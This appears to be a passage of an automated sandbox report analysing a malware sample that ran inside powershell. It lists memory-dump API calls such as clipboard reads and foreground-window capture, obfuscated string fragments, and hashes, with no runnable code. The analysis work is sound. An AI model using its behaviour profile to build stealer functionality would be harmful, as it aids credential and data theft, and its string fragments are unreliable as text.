                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D]+\$D]+\
                                                                                                        • API String ID: 0-1297882787
                                                                                                        • Opcode ID: 30075bc0288e0d91918027b30d8d233241e627d6287cf24c97fde2d93f81bf70
                                                                                                        • Instruction ID: 69279f5087e4f62d0d426cd9275475f8cf196777a585662fe09cdae49935fb4d
                                                                                                        • Opcode Fuzzy Hash: 30075bc0288e0d91918027b30d8d233241e627d6287cf24c97fde2d93f81bf70
                                                                                                        • Instruction Fuzzy Hash: A2216A38505111DBCB1CAB06DC5073FB36AEB09714F25693ED893973D1D768AC10878D
                                                                                                        APIs
                                                                                                        • LdrInitializeThunk.NTDLL(004412BD,?,00000018,?,?,00000018,?,?,?), ref: 0043E11E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 10998021e75b1681e0b95d5bcc4baff4f47d888305fdb145721d4fb3a48f6646
                                                                                                        • Instruction ID: 146906b21e84a71a5447d267da4ba6aaf717e0b7f914c08b2fcba104c0b58f90
                                                                                                        • Opcode Fuzzy Hash: 10998021e75b1681e0b95d5bcc4baff4f47d888305fdb145721d4fb3a48f6646
                                                                                                        • Instruction Fuzzy Hash: 61517D72E042205BD7249F18CC9077BB391EFD9704F16952EDD85B7390E6399C118BCA

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 507 43303d-433064 508 433066-433069 507->508 509 433107-43323f SysAllocString 508->509 510 43306f-433102 508->510 511 433241-433244 509->511 510->508 512 433246-4332aa 511->512 513 4332ac-4332eb 511->513 512->511 515 4332f5-433327 513->515
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocString
                                                                                                        • String ID: &2$0$92$<2$F2$G2$I2$J2$K2$P2$S2$S2$U2$V2$Y2$Y2$_2$rBW$1
                                                                                                        • API String ID: 2525500382-1704840789
                                                                                                        • Opcode ID: f902b592b6eba6466cdfafd08a383cbd4100be188b91849ddb173ee8b47d4ebe
                                                                                                        • Instruction ID: 74ae05fafc35c9b705cb94cf23568fa8391c61c6ad6acd50c28dcf27fe9afe66
                                                                                                        • Opcode Fuzzy Hash: f902b592b6eba6466cdfafd08a383cbd4100be188b91849ddb173ee8b47d4ebe
                                                                                                        • Instruction Fuzzy Hash: 9461C532A2D7508AD368CF68CA0539FB6E1BFC5300F15AA6DD4D99B364E7748901C78B

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1092 42ef29-42ef59 1093 42ef5b-42ef5e 1092->1093 1094 42ef90-42f0f6 SysAllocString 1093->1094 1095 42ef60-42ef8e 1093->1095 1096 42f0fc-42f0ff 1094->1096 1095->1093 1097 42f101-42f176 1096->1097 1098 42f178-42f1b5 1096->1098 1097->1096 1100 42f1bf-42f1f1 1098->1100
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocString
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 2525500382-4108050209
                                                                                                        • Opcode ID: 594bc527795c77264db86f739958c62bdc7127a453049ecb036233e592427bcf
                                                                                                        • Instruction ID: 0a4eaccf14a634c46fe98988d6e4d56a5479cc73525d61b797b192565461f97e
                                                                                                        • Opcode Fuzzy Hash: 594bc527795c77264db86f739958c62bdc7127a453049ecb036233e592427bcf
                                                                                                        • Instruction Fuzzy Hash: 64610674225B00CAE364DF79C1596DBB7E1BF5A300F44A82DC4EB8B321EB34A545CB4A

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1101 4301ab-430307 SysFreeString 1102 430309-43030c 1101->1102 1103 430345-430382 1102->1103 1104 43030e-430343 1102->1104 1106 43038c-4303b4 1103->1106 1104->1102
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeString
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 3341692771-4108050209
                                                                                                        • Opcode ID: 728ca5686f50925d4b47e5ed6fd6f75bb7f4880b0b866d1cb06efd7535016031
                                                                                                        • Instruction ID: cbe7c8c2ed5f32ff24dce75553806bf4a95f2713d3c6b96b5db25f257468730d
                                                                                                        • Opcode Fuzzy Hash: 728ca5686f50925d4b47e5ed6fd6f75bb7f4880b0b866d1cb06efd7535016031
                                                                                                        • Instruction Fuzzy Hash: 1741BD24129B808AD764EF79C59879BB7F1FF88300F12692DD4AB8B320E7356145CB4E

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1107 4367c7-43680d call 413d90 * 3 call 43f940 GetUserDefaultUILanguage 1116 43680f-436812 1107->1116 1117 436814-43683d 1116->1117 1118 43683f-436868 1116->1118 1117->1116
                                                                                                        APIs
                                                                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 004367F6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DefaultLanguageUser
                                                                                                        • String ID: O
                                                                                                        • API String ID: 95929093-1565894260
                                                                                                        • Opcode ID: 7616a595526bafa3687f96e99e0534a833ac6c132625a1b12df8f9f0694abd48
                                                                                                        • Instruction ID: 11def839418fd5d686b5f591c2ee6643e49fceff057299cf769fe895b6b669d2
                                                                                                        • Opcode Fuzzy Hash: 7616a595526bafa3687f96e99e0534a833ac6c132625a1b12df8f9f0694abd48
                                                                                                        • Instruction Fuzzy Hash: F901D6769001028BDB04AF79D9152AEB7A3BFD8311F29C57DD80157319D7389542C756
                                                                                                        APIs
                                                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C84A
                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C995
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2538663250-0
                                                                                                        • Opcode ID: 33b9f3f75c944a81cb14bf5bc3ef0b3239042d20b42293b3aa2c6582cb5774df
                                                                                                        • Instruction ID: 11e91efd5d4a476de7439511b11a1cf4b6fad113809ff6bef81543a0c430e8d1
                                                                                                        • Opcode Fuzzy Hash: 33b9f3f75c944a81cb14bf5bc3ef0b3239042d20b42293b3aa2c6582cb5774df
                                                                                                        • Instruction Fuzzy Hash: 5641F9B5D10B00AFD370EF3DDA4B7127EB4AB05250F40872DF9E68A6D4E630A4198BD6
                                                                                                        APIs
                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043E0A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 71dc51ca2d6fc07a2931c77ea297b4b54f03fc9e93f09199e39f5efe2c1ae787
                                                                                                        • Instruction ID: fec0c123637ed751c7014e425ce955774d5f5479ead2028489dbbb7dd98cc405
                                                                                                        • Opcode Fuzzy Hash: 71dc51ca2d6fc07a2931c77ea297b4b54f03fc9e93f09199e39f5efe2c1ae787
                                                                                                        • Instruction Fuzzy Hash: ADF0F07A824210FBC6012F29BD0194B3674EF8B329F05187AF00052022EB39C802EBAA
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32 ref: 0043E275
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ForegroundWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2020703349-0
                                                                                                        • Opcode ID: 6cb32618bc487382298e5b6f1fc3e7adf649a3ed36cba32df02c21826e090ae5
                                                                                                        • Instruction ID: 9ddbf6b16d43b63eaacfaa2c81d09df84929580d8ee5ee5cfd18515a6355f7fe
                                                                                                        • Opcode Fuzzy Hash: 6cb32618bc487382298e5b6f1fc3e7adf649a3ed36cba32df02c21826e090ae5
                                                                                                        • Instruction Fuzzy Hash: 24F0F6B6A061604BD7088F29D90535773E0AB8A305F005839E546D33A1D53A8D44C34A
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BlanketProxy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3890896728-0
                                                                                                        • Opcode ID: bd91b47e3060ad55cf2fe4b042bfb56b19f806254a51f7806ddc3c1a1fe9ff79
                                                                                                        • Instruction ID: 99560750887db020c88b0009a58cd09569da982514c7974981007fb546798a58
                                                                                                        • Opcode Fuzzy Hash: bd91b47e3060ad55cf2fe4b042bfb56b19f806254a51f7806ddc3c1a1fe9ff79
                                                                                                        • Instruction Fuzzy Hash: 30F0DAB4109701CFD314DF28D5A471ABBF0FB89704F10881CE1968B3A0CB75AA48CF82
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BlanketProxy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3890896728-0
                                                                                                        • Opcode ID: 56f13f92b7a1255e101520ede486534905b2a37b1a9ed86f7e4f59851042d4ca
                                                                                                        • Instruction ID: 62b65a42f15d7cc2309a1e08c51f1bcdbc725ecad25909c5d2c23be4bac06d58
                                                                                                        • Opcode Fuzzy Hash: 56f13f92b7a1255e101520ede486534905b2a37b1a9ed86f7e4f59851042d4ca
                                                                                                        • Instruction Fuzzy Hash: 0CF07FB45093429FE318DF25D5A871FBBE1BBC9308F60C91CE0944B694C3B59A098FC2
                                                                                                        APIs
                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CA0F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeSecurity
                                                                                                        • String ID:
                                                                                                        • API String ID: 640775948-0
                                                                                                        • Opcode ID: 0cf74e8c4fa9b9cebf6749d4c54df742595b7de921fd658c64fc65029d3aeeff
                                                                                                        • Instruction ID: ed5a73b1c9677f79df57209a6001f27ef0f41a1ff87bfd8a32e0076880d6d603
                                                                                                        • Opcode Fuzzy Hash: 0cf74e8c4fa9b9cebf6749d4c54df742595b7de921fd658c64fc65029d3aeeff
                                                                                                        • Instruction Fuzzy Hash: 4FD092783E47417BF6645B08AC17F107610A746F22F300224B362EE2D2C9907501861C
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0043E098,?,?,00000000,0040B30C,00000000,0040B333), ref: 0043C1FE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 161d6cc876b25b1b36f87deb656d717efb24626576a8b71b331aa942640a628b
                                                                                                        • Instruction ID: 4d879e3e48c6dc2181385bdab1c4d598bb94be339152225f8128b242698bd753
                                                                                                        • Opcode Fuzzy Hash: 161d6cc876b25b1b36f87deb656d717efb24626576a8b71b331aa942640a628b
                                                                                                        • Instruction Fuzzy Hash: 63D01232415232FBC6111F28FC06B9B3A54DF0A321F0308B6B4406B071D674DC91D6D8
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408819,556D4AF4), ref: 0043C1D0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: b70c299dbf8ad026ff3d646b08906a76d3bb47b7d5cd047be35dc264748042f0
                                                                                                        • Instruction ID: f06daee52db04fef9ffd77a93bf39f1218852508e2b390a71e91873d75b177fd
                                                                                                        • Opcode Fuzzy Hash: b70c299dbf8ad026ff3d646b08906a76d3bb47b7d5cd047be35dc264748042f0
                                                                                                        • Instruction Fuzzy Hash: 12C09B31455230BBC6102F15FC05FCA3F54EF56355F4550A7B04467072C760AC82C6D8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: w$"2&$(`"w$+d4v$/t$;,gk$;d$v$=t2c$tk
                                                                                                        • API String ID: 0-929208450
                                                                                                        • Opcode ID: 6fe4a89783577b8b8dc71a87290f0745d8695e541a1e71c7b3b54c067a0c1ff1
                                                                                                        • Instruction ID: 57b87d57f3c9de9105bea4e881d15640b7cf8e54a8238bdd52f6ede7f2aa1e3f
                                                                                                        • Opcode Fuzzy Hash: 6fe4a89783577b8b8dc71a87290f0745d8695e541a1e71c7b3b54c067a0c1ff1
                                                                                                        • Instruction Fuzzy Hash: 444279B490C3908FC321DF25C8507AFBBE1AF95314F14866DE8E55B392D73A8945CB8A
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL ref: 0041100D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: #o$#$Vh$q6$qi
                                                                                                        • API String ID: 237503144-3610294576
                                                                                                        • Opcode ID: 24bdf68054bc932f38a150c690828f4dcff0b4b26ec284e7472666cb6aaeadb5
                                                                                                        • Instruction ID: 8b034082395f838573e0f9c1b77793219c578cee44d2a0a158306dbafd125d5e
                                                                                                        • Opcode Fuzzy Hash: 24bdf68054bc932f38a150c690828f4dcff0b4b26ec284e7472666cb6aaeadb5
                                                                                                        • Instruction Fuzzy Hash: 3712A171A1D3408BC3249F79C4853EEB7E1AFC8314F15892FE9D997391DA7889818B4B
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1006321803-0
                                                                                                        • Opcode ID: 23d8670c13223ac8d427bdc199c3b0764472a9e89a818100f6a68e5cbb47d912
                                                                                                        • Instruction ID: 07fa625490295a4e76969198190a3f4785a56c74a67cc5372c365e7d5e2a77eb
                                                                                                        • Opcode Fuzzy Hash: 23d8670c13223ac8d427bdc199c3b0764472a9e89a818100f6a68e5cbb47d912
                                                                                                        • Instruction Fuzzy Hash: DD41B2B2D086119FD710AFB4D48626EBBB0BF44301F05853ED8859B341D7789A89C7DB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !{~{$#{ {$$SB$-{"{$/{,{$/{,{
                                                                                                        • API String ID: 0-1771253900
                                                                                                        • Opcode ID: 82210b81edd521d3dce38d2623ae5035ce87386d61d7dac2a5bff5bd3382191e
                                                                                                        • Instruction ID: f72d43909fc2cb886aae9656cee39960dfeaccfc7b1c9dd6433920021e8c23de
                                                                                                        • Opcode Fuzzy Hash: 82210b81edd521d3dce38d2623ae5035ce87386d61d7dac2a5bff5bd3382191e
                                                                                                        • Instruction Fuzzy Hash: EB41203861A310CBC7249F60E86167BB3F1FFC6341FA5186DE58297360E7788850CB4A
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00423065
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004230EA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: Pbx1$obx1
                                                                                                        • API String ID: 237503144-3160095297
                                                                                                        • Opcode ID: 5106aa6e973730c3b83cd0979d0ce10b40904b4194778254b7e470db64bab909
                                                                                                        • Instruction ID: 2d043df027a7d3965e94ad614ed74330e79769a2ec18d521d99abd520c407aeb
                                                                                                        • Opcode Fuzzy Hash: 5106aa6e973730c3b83cd0979d0ce10b40904b4194778254b7e470db64bab909
                                                                                                        • Instruction Fuzzy Hash: B881007565C311AFE320CF60EC81B1BB7E4FBC5704F11892DFA946B290D7B499068B86
                                                                                                        APIs
                                                                                                          • Part of subcall function 0043E0F0: LdrInitializeThunk.NTDLL(004412BD,?,00000018,?,?,00000018,?,?,?), ref: 0043E11E
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041996A
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00419A1B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                        • String ID: +4
                                                                                                        • API String ID: 764372645-371006243
                                                                                                        • Opcode ID: 25c4c967580f6b0ee39a6ffa4d832c6eed86d59da8a72b0389b6280f96fd35ae
                                                                                                        • Instruction ID: e567363f145b97950688bf2fb24687bf24cae1b5c1e056b29fc721f4ee7eab79
                                                                                                        • Opcode Fuzzy Hash: 25c4c967580f6b0ee39a6ffa4d832c6eed86d59da8a72b0389b6280f96fd35ae
                                                                                                        • Instruction Fuzzy Hash: 2FB27876A463105BE710CF64CD803ABB3E2ABD4304F1AC42DE98597391E7BD9C95CB86
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Z{V$Z{V$g{V$g{V
                                                                                                        • API String ID: 0-4205598400
                                                                                                        • Opcode ID: 791a6db6d37bca967a7d8775af97a9ff635258d7e804846fcbed0c4246788259
                                                                                                        • Instruction ID: 2735a1024a3d6ab3e679d68841893f3a8e932053e0ba995e88a79267ffb60799
                                                                                                        • Opcode Fuzzy Hash: 791a6db6d37bca967a7d8775af97a9ff635258d7e804846fcbed0c4246788259
                                                                                                        • Instruction Fuzzy Hash: E2816872D04300ABE308DF29DC4272BB6E2EFE5309F15953ED88DA7322E7788455875A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 64$B8$ro$~f
                                                                                                        • API String ID: 0-3005907464
                                                                                                        • Opcode ID: 67815121782669229ad639897576599399b8a1b1fb1bb0a6c3ef3cab52bda6e9
                                                                                                        • Instruction ID: f77cf1fb63027d9000466c16fe93f40d09de28bfb3c593ed1783a49cb2f31834
                                                                                                        • Opcode Fuzzy Hash: 67815121782669229ad639897576599399b8a1b1fb1bb0a6c3ef3cab52bda6e9
                                                                                                        • Instruction Fuzzy Hash: 0851E52651C3A186C7149B38850505FE7E2AFD9320F28AD2EF8E597764EA39C843C35B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: cc$L4$L4
                                                                                                        • API String ID: 0-2811325430
                                                                                                        • Opcode ID: fe478f9096acbbc6bde1488969e9fee500b63427ddb3794dd368c5ac8ab09083
                                                                                                        • Instruction ID: bcc7170a97565d77c4348bff3c6b942111de8cda2cf3e40afdd33485117747e3
                                                                                                        • Opcode Fuzzy Hash: fe478f9096acbbc6bde1488969e9fee500b63427ddb3794dd368c5ac8ab09083
                                                                                                        • Instruction Fuzzy Hash: FC423476A083519BD724CF24C8547AFB3E2FFC5304F15892EE88997391EB399845CB86
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4w$sub
                                                                                                        • API String ID: 0-3989355360
                                                                                                        • Opcode ID: 49237ceb415039d448eff18524d38ad99e91b372b50cd8c51f520d07d13edde3
                                                                                                        • Instruction ID: fb506ad9777267d5baf7ad5e03968dedae21db2d769d98f9343bedbe223205fe
                                                                                                        • Opcode Fuzzy Hash: 49237ceb415039d448eff18524d38ad99e91b372b50cd8c51f520d07d13edde3
                                                                                                        • Instruction Fuzzy Hash: 61027C71A082618BC7149F28D85136BB7E2EF85304F49487FE8C997382D63DDD45CB9A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: :$X w
                                                                                                        • API String ID: 0-1300669176
                                                                                                        • Opcode ID: da439eb0edf64d587349cd665ca4562f53eb16d7733249cc7a6b1eb03273180c
                                                                                                        • Instruction ID: 5ded977b00c1926fc7bc06d4f9b45fa2cffaf300d00cc5cfff9bfe83dc4de463
                                                                                                        • Opcode Fuzzy Hash: da439eb0edf64d587349cd665ca4562f53eb16d7733249cc7a6b1eb03273180c
                                                                                                        • Instruction Fuzzy Hash: 70D1D43A628311CBCB189F38D8512AB73F1FF4A755F0A887DD9814B2A0E73A8D61D715
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4/$>:
                                                                                                        • API String ID: 0-3529472704
                                                                                                        • Opcode ID: 821f3d929cc9ec9ff969c50021c4a1541ab36428585dd371a4b593deff11f8fc
                                                                                                        • Instruction ID: 8b1a751cfb05d5f152768d7c29b6ea9f203b357cb662e081bdd6b6ddfd1c81bd
                                                                                                        • Opcode Fuzzy Hash: 821f3d929cc9ec9ff969c50021c4a1541ab36428585dd371a4b593deff11f8fc
                                                                                                        • Instruction Fuzzy Hash: E7B1E77250C79197D325CF29C85076BFBE0EF96304F09596EE8C5AB382D2398D06C79A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2995280814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: C<X<$V<V<
                                                                                                        • API String ID: 0-2217627203
                                                                                                        • Opcode ID: 6fdfba9d35220f6eb72d435abaee4269093627fe2cbc792f237b65be4f121c62
                                                                                                        • Instruction ID: d7075f50ca02dd5208c2294db79d2b3416935b123847e84921d14f1daebbff4d
                                                                                                        • Opcode Fuzzy Hash: 6fdfba9d35220f6eb72d435abaee4269093627fe2cbc792f237b65be4f121c62
                                                                                                        • Instruction Fuzzy Hash: 958123B17043109BD720EF20DC82B6B73A5EFA1358F54452DE9898B3A0E779E904C76A
                                                                                                        Strings
                                                                                                        Memory Dump Source
